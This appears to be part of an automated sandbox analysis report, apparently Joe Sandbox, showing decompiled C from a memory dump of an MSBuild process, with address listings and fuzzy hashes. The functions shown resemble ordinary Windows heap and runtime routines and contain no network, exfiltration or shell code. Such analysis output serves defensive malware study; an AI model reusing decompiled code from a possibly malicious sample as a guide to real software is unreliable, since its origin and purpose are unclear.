                                            				void* __esi;
                                            				signed short _t42;
                                            				char* _t44;
                                            				intOrPtr _t46;
                                            				intOrPtr _t50;
                                            				char* _t57;
                                            				intOrPtr _t59;
                                            				intOrPtr _t67;
                                            				signed int _t69;
                                            
                                            				_t64 = __edx;
                                            				_v12 =  *0x10fd360 ^ _t69;
                                            				_t65 = 0xa0;
                                            				_v196 = __edx;
                                            				_v177 = 0;
                                            				_t67 = __ecx;
                                            				_v192 = __ecx;
                                            				E0104FA60( &_v176, 0, 0xa0);
                                            				_t57 =  &_v176;
                                            				_t59 = 0xa0;
                                            				if( *0x10f7bc8 != 0) {
                                            					L3:
                                            					while(1) {
                                            						asm("movsd");
                                            						asm("movsd");
                                            						asm("movsd");
                                            						asm("movsd");
                                            						_t67 = _v192;
                                            						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
                                            						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
                                            						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
                                            						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
                                            						_push( &_v184);
                                            						_push(_t59);
                                            						_push(_t57);
                                            						_push(0xa0);
                                            						_push(_t57);
                                            						_push(0xf);
                                            						_t42 = E0104B0B0();
                                            						if(_t42 != 0xc0000023) {
                                            							break;
                                            						}
                                            						if(_v177 != 0) {
                                            							L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                                            						}
                                            						_v177 = 1;
                                            						_t44 = L01024620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
                                            						_t59 = _v184;
                                            						_t57 = _t44;
                                            						if(_t57 != 0) {
                                            							continue;
                                            						} else {
                                            							_t42 = 0xc0000017;
                                            							break;
                                            						}
                                            					}
                                            					if(_t42 != 0) {
                                            						_t65 = E0100CCC0(_t42);
                                            						if(_t65 != 0) {
                                            							L10:
                                            							if(_v177 != 0) {
                                            								if(_t57 != 0) {
                                            									L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                                            								}
                                            							}
                                            							_t46 = _t65;
                                            							L12:
                                            							return E0104B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
                                            						}
                                            						L7:
                                            						_t50 = _a4;
                                            						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
                                            						if(_t50 != 3) {
                                            							if(_t50 == 2) {
                                            								goto L8;
                                            							}
                                            							L9:
                                            							if(E0104F380(_t67 + 0xc, 0xfe5138, 0x10) == 0) {
                                            								 *0x10f60d8 = _t67;
                                            							}
                                            							goto L10;
                                            						}
                                            						L8:
                                            						_t64 = _t57 + 0x28;
                                            						E01034F49(_t67, _t57 + 0x28);
                                            						goto L9;
                                            					}
                                            					_t65 = 0;
                                            					goto L7;
                                            				}
                                            				if(E01034E70(0x10f86b0, 0x1035690, 0, 0) != 0) {
                                            					_t46 = E0100CCC0(_t56);
                                            					goto L12;
                                            				} else {
                                            					_t59 = 0xa0;
                                            					goto L3;
                                            				}
                                            			}




















                                            0x01034d3b
                                            0x01034d4d
                                            0x01034d53
                                            0x01034d58
                                            0x01034d65
                                            0x01034d6c
                                            0x01034d71
                                            0x01034d77
                                            0x01034d7f
                                            0x01034d8c
                                            0x01034d8e
                                            0x01034dad
                                            0x01034db0
                                            0x01034db7
                                            0x01034db8
                                            0x01034db9
                                            0x01034dba
                                            0x01034dbb
                                            0x01034dc1
                                            0x01034dc8
                                            0x01034dcc
                                            0x01034dd5
                                            0x01034dde
                                            0x01034ddf
                                            0x01034de0
                                            0x01034de1
                                            0x01034de6
                                            0x01034de7
                                            0x01034de9
                                            0x01034df3
                                            0x00000000
                                            0x00000000
                                            0x01076c7c
                                            0x01076c8a
                                            0x01076c8a
                                            0x01076c9d
                                            0x01076ca7
                                            0x01076cac
                                            0x01076cb2
                                            0x01076cb9
                                            0x00000000
                                            0x01076cbf
                                            0x01076cbf
                                            0x00000000
                                            0x01076cbf
                                            0x01076cb9
                                            0x01034dfb
                                            0x01076ccf
                                            0x01076cd3
                                            0x01034e32
                                            0x01034e39
                                            0x01076ce0
                                            0x01076cf2
                                            0x01076cf2
                                            0x01076ce0
                                            0x01034e3f
                                            0x01034e41
                                            0x01034e51
                                            0x01034e51
                                            0x01034e03
                                            0x01034e03
                                            0x01034e09
                                            0x01034e0f
                                            0x01034e57
                                            0x00000000
                                            0x00000000
                                            0x01034e1b
                                            0x01034e30
                                            0x01034e5b
                                            0x01034e5b
                                            0x00000000
                                            0x01034e30
                                            0x01034e11
                                            0x01034e11
                                            0x01034e16
                                            0x00000000
                                            0x01034e16
                                            0x01034e01
                                            0x00000000
                                            0x01034e01
                                            0x01034da5
                                            0x01076c6b
                                            0x00000000
                                            0x01034dab
                                            0x01034dab
                                            0x00000000
                                            0x01034dab

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b7a6882b5f87de585ff9091f288f9091493e24718cf626486cad69137dd94bee
                                            • Instruction ID: f0a341d688df02a3b29b0e2aed45415797941139c88c6d9e539e248150d21d80
                                            • Opcode Fuzzy Hash: b7a6882b5f87de585ff9091f288f9091493e24718cf626486cad69137dd94bee
                                            • Instruction Fuzzy Hash: D141D171A443189FEB22DF18CC80FAAB7E9EB94710F0440E9E986DB281D775DD40CBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 94%
                                            			E01018A0A(intOrPtr* __ecx, signed int __edx) {
                                            				signed int _v8;
                                            				char _v524;
                                            				signed int _v528;
                                            				void* _v532;
                                            				char _v536;
                                            				char _v540;
                                            				char _v544;
                                            				intOrPtr* _v548;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				signed int _t44;
                                            				void* _t46;
                                            				void* _t48;
                                            				signed int _t53;
                                            				signed int _t55;
                                            				intOrPtr* _t62;
                                            				void* _t63;
                                            				unsigned int _t75;
                                            				signed int _t79;
                                            				unsigned int _t81;
                                            				unsigned int _t83;
                                            				signed int _t84;
                                            				void* _t87;
                                            
                                            				_t76 = __edx;
                                            				_v8 =  *0x10fd360 ^ _t84;
                                            				_v536 = 0x200;
                                            				_t79 = 0;
                                            				_v548 = __edx;
                                            				_v544 = 0;
                                            				_t62 = __ecx;
                                            				_v540 = 0;
                                            				_v532 =  &_v524;
                                            				if(__edx == 0 || __ecx == 0) {
                                            					L6:
                                            					return E0104B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
                                            				} else {
                                            					_v528 = 0;
                                            					E0101E9C0(1, __ecx, 0, 0,  &_v528);
                                            					_t44 = _v528;
                                            					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
                                            					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
                                            					_t46 = 0xa;
                                            					_t87 = _t81 - _t46;
                                            					if(_t87 > 0 || _t87 == 0) {
                                            						 *_v548 = 0xfe1180;
                                            						L5:
                                            						_t79 = 1;
                                            						goto L6;
                                            					} else {
                                            						_t48 = E01031DB5(_t62,  &_v532,  &_v536);
                                            						_t76 = _v528;
                                            						if(_t48 == 0) {
                                            							L9:
                                            							E01043C2A(_t81, _t76,  &_v544);
                                            							 *_v548 = _v544;
                                            							goto L5;
                                            						}
                                            						_t62 = _v532;
                                            						if(_t62 != 0) {
                                            							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
                                            							_t53 =  *_t62;
                                            							_v528 = _t53;
                                            							if(_t53 != 0) {
                                            								_t63 = _t62 + 4;
                                            								_t55 = _v528;
                                            								do {
                                            									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
                                            										if(E01018999(_t63,  &_v540) == 0) {
                                            											_t55 = _v528;
                                            										} else {
                                            											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
                                            											_t55 = _v528;
                                            											if(_t75 >= _t83) {
                                            												_t83 = _t75;
                                            											}
                                            										}
                                            									}
                                            									_t63 = _t63 + 0x14;
                                            									_t55 = _t55 - 1;
                                            									_v528 = _t55;
                                            								} while (_t55 != 0);
                                            								_t62 = _v532;
                                            							}
                                            							if(_t62 !=  &_v524) {
                                            								L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
                                            							}
                                            							_t76 = _t83 & 0x0000ffff;
                                            							_t81 = _t83 >> 0x10;
                                            						}
                                            						goto L9;
                                            					}
                                            				}
                                            			}



























                                            0x01018a0a
                                            0x01018a1c
                                            0x01018a23
                                            0x01018a2e
                                            0x01018a30
                                            0x01018a36
                                            0x01018a3c
                                            0x01018a3e
                                            0x01018a4a
                                            0x01018a52
                                            0x01018a9c
                                            0x01018aae
                                            0x01018a58
                                            0x01018a5e
                                            0x01018a6a
                                            0x01018a6f
                                            0x01018a75
                                            0x01018a7d
                                            0x01018a85
                                            0x01018a86
                                            0x01018a89
                                            0x01018a93
                                            0x01018a99
                                            0x01018a9b
                                            0x00000000
                                            0x01018aaf
                                            0x01018abe
                                            0x01018ac3
                                            0x01018acb
                                            0x01018ad7
                                            0x01018ae0
                                            0x01018af1
                                            0x00000000
                                            0x01018af1
                                            0x01018acd
                                            0x01018ad5
                                            0x01018afb
                                            0x01018afd
                                            0x01018aff
                                            0x01018b07
                                            0x01018b22
                                            0x01018b24
                                            0x01018b2a
                                            0x01018b2e
                                            0x01018b3f
                                            0x01018b78
                                            0x01018b41
                                            0x01018b52
                                            0x01018b54
                                            0x01018b5c
                                            0x01018b74
                                            0x01018b74
                                            0x01018b5c
                                            0x01018b3f
                                            0x01018b5e
                                            0x01018b61
                                            0x01018b64
                                            0x01018b64
                                            0x01018b6c
                                            0x01018b6c
                                            0x01018b11
                                            0x01069cd5
                                            0x01069cd5
                                            0x01018b17
                                            0x01018b1a
                                            0x01018b1a
                                            0x00000000
                                            0x01018ad5
                                            0x01018a89

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0c627af6cf3148ea7de2ca4574148b0664008a44e355df151201436ec04c6ed5
                                            • Instruction ID: acb2fb85b5bd9c96737924b822c436c83d9a895219b196b2f7fa78aa894b5ce9
                                            • Opcode Fuzzy Hash: 0c627af6cf3148ea7de2ca4574148b0664008a44e355df151201436ec04c6ed5
                                            • Instruction Fuzzy Hash: 3E4182B1A0022D9BDB64DF59C8C8AE9B7F8FB94300F5081EAD95997246E7749F80CF50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E010CAA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
                                            				intOrPtr _v8;
                                            				char _v12;
                                            				signed int _v16;
                                            				signed char _v20;
                                            				intOrPtr _v24;
                                            				char* _t37;
                                            				void* _t47;
                                            				signed char _t51;
                                            				void* _t53;
                                            				char _t55;
                                            				intOrPtr _t57;
                                            				signed char _t61;
                                            				intOrPtr _t75;
                                            				void* _t76;
                                            				signed int _t81;
                                            				intOrPtr _t82;
                                            
                                            				_t53 = __ecx;
                                            				_t55 = 0;
                                            				_v20 = _v20 & 0;
                                            				_t75 = __edx;
                                            				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
                                            				_v24 = __edx;
                                            				_v12 = 0;
                                            				if((_t81 & 0x01000000) != 0) {
                                            					L5:
                                            					if(_a8 != 0) {
                                            						_t81 = _t81 | 0x00000008;
                                            					}
                                            					_t57 = E010CABF4(_t55 + _t75, _t81);
                                            					_v8 = _t57;
                                            					if(_t57 < _t75 || _t75 > 0x7fffffff) {
                                            						_t76 = 0;
                                            						_v16 = _v16 & 0;
                                            					} else {
                                            						_t59 = _t53;
                                            						_t76 = E010CAB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
                                            						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
                                            							_t47 = E010CAC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
                                            							_t61 = _v20;
                                            							if(_t61 != 0) {
                                            								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
                                            								if(E010ACB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
                                            									L010277F0(_t53, 0, _t76);
                                            									_t76 = 0;
                                            								}
                                            							}
                                            						}
                                            					}
                                            					_t82 = _v8;
                                            					L16:
                                            					if(E01027D50() == 0) {
                                            						_t37 = 0x7ffe0380;
                                            					} else {
                                            						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                            					}
                                            					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                            						E010C131B(_t53, _t76, _t82, _v16);
                                            					}
                                            					return _t76;
                                            				}
                                            				_t51 =  *(__ecx + 0x20);
                                            				_v20 = _t51;
                                            				if(_t51 == 0) {
                                            					goto L5;
                                            				}
                                            				_t81 = _t81 | 0x00000008;
                                            				if(E010ACB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
                                            					_t55 = _v12;
                                            					goto L5;
                                            				} else {
                                            					_t82 = 0;
                                            					_t76 = 0;
                                            					_v16 = _v16 & 0;
                                            					goto L16;
                                            				}
                                            			}



















                                            0x010caa1f
                                            0x010caa21
                                            0x010caa23
                                            0x010caa2b
                                            0x010caa30
                                            0x010caa36
                                            0x010caa39
                                            0x010caa42
                                            0x010caa75
                                            0x010caa7a
                                            0x010caa7c
                                            0x010caa7c
                                            0x010caa88
                                            0x010caa8a
                                            0x010caa8f
                                            0x010cab02
                                            0x010cab04
                                            0x010caa99
                                            0x010caaa8
                                            0x010caaaf
                                            0x010caab3
                                            0x010caacc
                                            0x010caad1
                                            0x010caad6
                                            0x010caae0
                                            0x010caaf3
                                            0x010caaf9
                                            0x010caafe
                                            0x010caafe
                                            0x010caaf3
                                            0x010caad6
                                            0x010caab3
                                            0x010cab07
                                            0x010cab0a
                                            0x010cab11
                                            0x010cab23
                                            0x010cab13
                                            0x010cab1c
                                            0x010cab1c
                                            0x010cab2b
                                            0x010cab44
                                            0x010cab44
                                            0x010cab51
                                            0x010cab51
                                            0x010caa44
                                            0x010caa47
                                            0x010caa4c
                                            0x00000000
                                            0x00000000
                                            0x010caa5a
                                            0x010caa64
                                            0x010caa72
                                            0x00000000
                                            0x010caa66
                                            0x010caa66
                                            0x010caa68
                                            0x010caa6a
                                            0x00000000
                                            0x010caa6a

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                            • Instruction ID: 34c49b4d4aa725e8c871b1f3ef60828af4febda1117c0c8beb1d77b644acf6ab
                                            • Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                            • Instruction Fuzzy Hash: 50310871F0010DABEB158B69CC45BAFFBB6DF84A10F0544ADE985A7252EB748D00CA50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 76%
                                            			E010CFDE2(signed int* __ecx, signed int __edx, signed int _a4) {
                                            				char _v8;
                                            				signed int _v12;
                                            				signed int _t29;
                                            				char* _t32;
                                            				char* _t43;
                                            				signed int _t80;
                                            				signed int* _t84;
                                            
                                            				_push(__ecx);
                                            				_push(__ecx);
                                            				_t56 = __edx;
                                            				_t84 = __ecx;
                                            				_t80 = E010CFD4E(__ecx, __edx);
                                            				_v12 = _t80;
                                            				if(_t80 != 0) {
                                            					_t29 =  *__ecx & _t80;
                                            					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
                                            					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
                                            						E010D0A13(__ecx, _t80, 0, _a4);
                                            						_t80 = 1;
                                            						if(E01027D50() == 0) {
                                            							_t32 = 0x7ffe0380;
                                            						} else {
                                            							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                            						}
                                            						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                            							_push(3);
                                            							L21:
                                            							E010C1608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
                                            						}
                                            						goto L22;
                                            					}
                                            					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
                                            						_t80 = E010D2B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
                                            						if(_t80 != 0) {
                                            							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
                                            							_t77 = _v8;
                                            							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
                                            								E010CC8F7(_t66, _t77, 0);
                                            							}
                                            						}
                                            					} else {
                                            						_t80 = E010CDBD2(__ecx[0xb], _t74, __edx, _a4);
                                            					}
                                            					if(E01027D50() == 0) {
                                            						_t43 = 0x7ffe0380;
                                            					} else {
                                            						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                            					}
                                            					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
                                            						goto L22;
                                            					} else {
                                            						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
                                            						goto L21;
                                            					}
                                            				} else {
                                            					_push(__ecx);
                                            					_push(_t80);
                                            					E010CA80D(__ecx[0xf], 9, __edx, _t80);
                                            					L22:
                                            					return _t80;
                                            				}
                                            			}










                                            0x010cfde7
                                            0x010cfde8
                                            0x010cfdec
                                            0x010cfdee
                                            0x010cfdf5
                                            0x010cfdf7
                                            0x010cfdfc
                                            0x010cfe19
                                            0x010cfe22
                                            0x010cfe26
                                            0x010cfec6
                                            0x010cfecd
                                            0x010cfed5
                                            0x010cfee7
                                            0x010cfed7
                                            0x010cfee0
                                            0x010cfee0
                                            0x010cfeef
                                            0x010cff00
                                            0x010cff02
                                            0x010cff07
                                            0x010cff07
                                            0x00000000
                                            0x010cfeef
                                            0x010cfe33
                                            0x010cfe55
                                            0x010cfe59
                                            0x010cfe5b
                                            0x010cfe5e
                                            0x010cfe69
                                            0x010cfe6d
                                            0x010cfe6d
                                            0x010cfe69
                                            0x010cfe35
                                            0x010cfe41
                                            0x010cfe41
                                            0x010cfe79
                                            0x010cfe8b
                                            0x010cfe7b
                                            0x010cfe84
                                            0x010cfe84
                                            0x010cfe93
                                            0x00000000
                                            0x010cfea8
                                            0x010cfeba
                                            0x00000000
                                            0x010cfeba
                                            0x010cfdfe
                                            0x010cfe01
                                            0x010cfe02
                                            0x010cfe08
                                            0x010cff0c
                                            0x010cff14
                                            0x010cff14

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                            • Instruction ID: 86b37a9c2d0582a3f313f7f752fa6830742487ab437637c1394c0ba8ec71960c
                                            • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                            • Instruction Fuzzy Hash: D731D332200642AFD7229768C854FAE7BEBEF85F50F18409DE5C58B342DA74D842CF52
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 70%
                                            			E010CEA55(intOrPtr* __ecx, char __edx, signed int _a4) {
                                            				signed int _v8;
                                            				char _v12;
                                            				intOrPtr _v15;
                                            				char _v16;
                                            				intOrPtr _v19;
                                            				void* _v28;
                                            				intOrPtr _v36;
                                            				void* __ebx;
                                            				void* __edi;
                                            				signed char _t26;
                                            				signed int _t27;
                                            				char* _t40;
                                            				unsigned int* _t50;
                                            				intOrPtr* _t58;
                                            				unsigned int _t59;
                                            				char _t75;
                                            				signed int _t86;
                                            				intOrPtr _t88;
                                            				intOrPtr* _t91;
                                            
                                            				_t75 = __edx;
                                            				_t91 = __ecx;
                                            				_v12 = __edx;
                                            				_t50 = __ecx + 0x30;
                                            				_t86 = _a4 & 0x00000001;
                                            				if(_t86 == 0) {
                                            					E01022280(_t26, _t50);
                                            					_t75 = _v16;
                                            				}
                                            				_t58 = _t91;
                                            				_t27 = E010CE815(_t58, _t75);
                                            				_v8 = _t27;
                                            				if(_t27 != 0) {
                                            					E0100F900(_t91 + 0x34, _t27);
                                            					if(_t86 == 0) {
                                            						E0101FFB0(_t50, _t86, _t50);
                                            					}
                                            					_push( *((intOrPtr*)(_t91 + 4)));
                                            					_push( *_t91);
                                            					_t59 =  *(_v8 + 0x10);
                                            					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
                                            					_push(0x8000);
                                            					_t11 = _t53 - 1; // 0x0
                                            					_t12 = _t53 - 1; // 0x0
                                            					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
                                            					E010CAFDE( &_v12,  &_v16);
                                            					asm("lock xadd [eax], ecx");
                                            					asm("lock xadd [eax], ecx");
                                            					E010CBCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
                                            					_t55 = _v36;
                                            					_t88 = _v36;
                                            					if(E01027D50() == 0) {
                                            						_t40 = 0x7ffe0388;
                                            					} else {
                                            						_t55 = _v19;
                                            						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                            					}
                                            					if( *_t40 != 0) {
                                            						E010BFE3F(_t55, _t91, _v15, _t55);
                                            					}
                                            				} else {
                                            					if(_t86 == 0) {
                                            						E0101FFB0(_t50, _t86, _t50);
                                            						_t75 = _v16;
                                            					}
                                            					_push(_t58);
                                            					_t88 = 0;
                                            					_push(0);
                                            					E010CA80D(_t91, 8, _t75, 0);
                                            				}
                                            				return _t88;
                                            			}






















                                            0x010cea55
                                            0x010cea66
                                            0x010cea68
                                            0x010cea6c
                                            0x010cea6f
                                            0x010cea72
                                            0x010cea75
                                            0x010cea7a
                                            0x010cea7a
                                            0x010cea7e
                                            0x010cea80
                                            0x010cea85
                                            0x010cea8b
                                            0x010ceab5
                                            0x010ceabc
                                            0x010ceabf
                                            0x010ceabf
                                            0x010ceaca
                                            0x010ceace
                                            0x010cead0
                                            0x010ceae4
                                            0x010ceaeb
                                            0x010ceaf0
                                            0x010ceaf5
                                            0x010ceb09
                                            0x010ceb0d
                                            0x010ceb1d
                                            0x010ceb2d
                                            0x010ceb38
                                            0x010ceb3d
                                            0x010ceb41
                                            0x010ceb4a
                                            0x010ceb60
                                            0x010ceb4c
                                            0x010ceb52
                                            0x010ceb59
                                            0x010ceb59
                                            0x010ceb68
                                            0x010ceb71
                                            0x010ceb71
                                            0x010cea8d
                                            0x010cea8f
                                            0x010cea92
                                            0x010cea97
                                            0x010cea97
                                            0x010cea9b
                                            0x010cea9c
                                            0x010cea9e
                                            0x010ceaa6
                                            0x010ceaa6
                                            0x010ceb7e

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                            • Instruction ID: b5cc6afdee05c72c3da45c1c9595a81c1476e3ed23a024ee45a577b475cf920a
                                            • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                            • Instruction Fuzzy Hash: CE31B4726047069FC719DF28C880AAFBBE9FFD0610F04492DF59687645DE34E809CBA5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 69%
                                            			E010869A6(signed short* __ecx, void* __eflags) {
                                            				signed int _v8;
                                            				signed int _v16;
                                            				intOrPtr _v20;
                                            				signed int _v24;
                                            				signed short _v28;
                                            				signed int _v32;
                                            				intOrPtr _v36;
                                            				signed int _v40;
                                            				char* _v44;
                                            				signed int _v48;
                                            				intOrPtr _v52;
                                            				signed int _v56;
                                            				char _v60;
                                            				signed int _v64;
                                            				char _v68;
                                            				char _v72;
                                            				signed short* _v76;
                                            				signed int _v80;
                                            				char _v84;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				void* _t68;
                                            				intOrPtr _t73;
                                            				signed short* _t74;
                                            				void* _t77;
                                            				void* _t78;
                                            				signed int _t79;
                                            				signed int _t80;
                                            
                                            				_v8 =  *0x10fd360 ^ _t80;
                                            				_t75 = 0x100;
                                            				_v64 = _v64 & 0x00000000;
                                            				_v76 = __ecx;
                                            				_t79 = 0;
                                            				_t68 = 0;
                                            				_v72 = 1;
                                            				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
                                            				_t77 = 0;
                                            				if(L01016C59(__ecx[2], 0x100, __eflags) != 0) {
                                            					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
                                            					if(_t79 != 0 && E01086BA3() != 0) {
                                            						_push(0);
                                            						_push(0);
                                            						_push(0);
                                            						_push(0x1f0003);
                                            						_push( &_v64);
                                            						if(E01049980() >= 0) {
                                            							E01022280(_t56, 0x10f8778);
                                            							_t77 = 1;
                                            							_t68 = 1;
                                            							if( *0x10f8774 == 0) {
                                            								asm("cdq");
                                            								 *(_t79 + 0xf70) = _v64;
                                            								 *(_t79 + 0xf74) = 0x100;
                                            								_t75 = 0;
                                            								_t73 = 4;
                                            								_v60 =  &_v68;
                                            								_v52 = _t73;
                                            								_v36 = _t73;
                                            								_t74 = _v76;
                                            								_v44 =  &_v72;
                                            								 *0x10f8774 = 1;
                                            								_v56 = 0;
                                            								_v28 = _t74[2];
                                            								_v48 = 0;
                                            								_v20 = ( *_t74 & 0x0000ffff) + 2;
                                            								_v40 = 0;
                                            								_v32 = 0;
                                            								_v24 = 0;
                                            								_v16 = 0;
                                            								if(E0100B6F0(0xfec338, 0xfec288, 3,  &_v60) == 0) {
                                            									_v80 = _v80 | 0xffffffff;
                                            									_push( &_v84);
                                            									_push(0);
                                            									_push(_v64);
                                            									_v84 = 0xfa0a1f00;
                                            									E01049520();
                                            								}
                                            							}
                                            						}
                                            					}
                                            				}
                                            				if(_v64 != 0) {
                                            					_push(_v64);
                                            					E010495D0();
                                            					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
                                            					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
                                            				}
                                            				if(_t77 != 0) {
                                            					E0101FFB0(_t68, _t77, 0x10f8778);
                                            				}
                                            				_pop(_t78);
                                            				return E0104B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
                                            			}
































                                            0x010869b5
                                            0x010869be
                                            0x010869c3
                                            0x010869c9
                                            0x010869cc
                                            0x010869d1
                                            0x010869d3
                                            0x010869de
                                            0x010869e1
                                            0x010869ea
                                            0x010869f6
                                            0x010869fe
                                            0x01086a13
                                            0x01086a14
                                            0x01086a15
                                            0x01086a16
                                            0x01086a1e
                                            0x01086a26
                                            0x01086a31
                                            0x01086a36
                                            0x01086a37
                                            0x01086a40
                                            0x01086a49
                                            0x01086a4a
                                            0x01086a53
                                            0x01086a59
                                            0x01086a5d
                                            0x01086a5e
                                            0x01086a64
                                            0x01086a67
                                            0x01086a6a
                                            0x01086a6d
                                            0x01086a70
                                            0x01086a77
                                            0x01086a7d
                                            0x01086a86
                                            0x01086a89
                                            0x01086a9c
                                            0x01086a9f
                                            0x01086aa2
                                            0x01086aa5
                                            0x01086aaf
                                            0x01086ab1
                                            0x01086ab8
                                            0x01086ab9
                                            0x01086abb
                                            0x01086abe
                                            0x01086ac5
                                            0x01086ac5
                                            0x01086aaf
                                            0x01086a40
                                            0x01086a26
                                            0x010869fe
                                            0x01086ace
                                            0x01086ad0
                                            0x01086ad3
                                            0x01086ad8
                                            0x01086adf
                                            0x01086adf
                                            0x01086ae8
                                            0x01086aef
                                            0x01086aef
                                            0x01086af9
                                            0x01086b06

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 500c4559b9dd26f8c36089d0dc6a4c29c36862d97c8e8571b3443ac451eb14ab
